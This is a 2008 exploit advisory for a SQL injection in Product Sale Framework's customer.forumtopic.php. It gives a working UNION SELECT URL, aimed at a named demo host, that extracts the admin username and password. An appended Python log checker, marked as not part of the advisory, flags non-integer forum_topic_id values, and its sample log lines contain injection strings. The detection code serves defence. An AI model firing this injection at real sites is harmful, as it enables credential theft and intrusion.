+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+                                                                    +
+         Product Sale Framework SQL Injection Vulnerability         +
+                                                                    +
+                        Discovered by b3hz4d                        +
+                                                                    +
+                        WwW.DeltaHacking.Net                        +
+                                                                    +
+                                                                    +
+                                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

APA Center of Yazd University
(https://www.ircert.cc)

AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 06 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR        : http://www.productsaleframework.com
DEMO (links)  : http://www.productsaleframework.com

#####################################################

[+] vuln :
customer.forumtopic.php

The vulnerability is in the forum. All demo links (Admin demo, Affiliate demo, Customer demo) are here:

http://www.productsaleframework.com/

[+] Exploit :
Admin Username and Password:

http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
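
Added example, not part of the original advisory and not vendor code: a log check that flags any request to customer.forumtopic.php whose forum_topic_id is not a plain integer, which covers the request above and, more generally, any other non-numeric value. The log lines are constructed, and the function names and the 1-10 digit rule for a valid id are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter named in the advisory above.
SCRIPT = "customer.forumtopic.php"
PARAM = "forum_topic_id"

# Request part of a common/combined-format access log line.
# The target is matched greedily: an unencoded payload can contain spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/\d(?:\.\d)?"')

# Assumption: a legitimate topic id is 1-10 ASCII digits and nothing else.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_values(log_line):
    """Return forum_topic_id values in one log line that are not plain integers."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + SCRIPT):
        return []
    # parse_qs URL-decodes values and keeps repeated parameters, so an
    # encoded payload or a duplicated forum_topic_id is still inspected.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not VALID_ID_RE.fullmatch(v)]


def scan(lines):
    """Yield (line_number, client_ip, bad_value) for every rejected value."""
    for n, line in enumerate(lines, 1):
        for value in suspicious_values(line):
            yield n, line.split(" ", 1)[0], value


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Dec/2008:10:00:01 +0000] "GET /demo/psf/customer/customer.forumtopic.php?forum_topic_id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Dec/2008:10:00:09 +0000] "GET /demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1%20union%20select%201,2,3,4,5,6 HTTP/1.1" 200 4875',
    '192.0.2.10 - - [07/Dec/2008:10:00:15 +0000] "GET /favicon.ico HTTP/1.1" 200 318',
    '203.0.113.5 - - [07/Dec/2008:10:01:02 +0000] "GET /demo/psf/customer/customer.forumtopic.php?forum_topic_id=7&forum_topic_id=7+or+1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: %s sent forum_topic_id=%r" % hit)
```

The same digits-only rule, applied in the application before the value reaches the query, rejects the request instead of only logging it.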


###########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all members in DeltaHacking.Net & Snoop-Security.Com #

###########################################################################################################

# milw0rm.com [2008-12-07]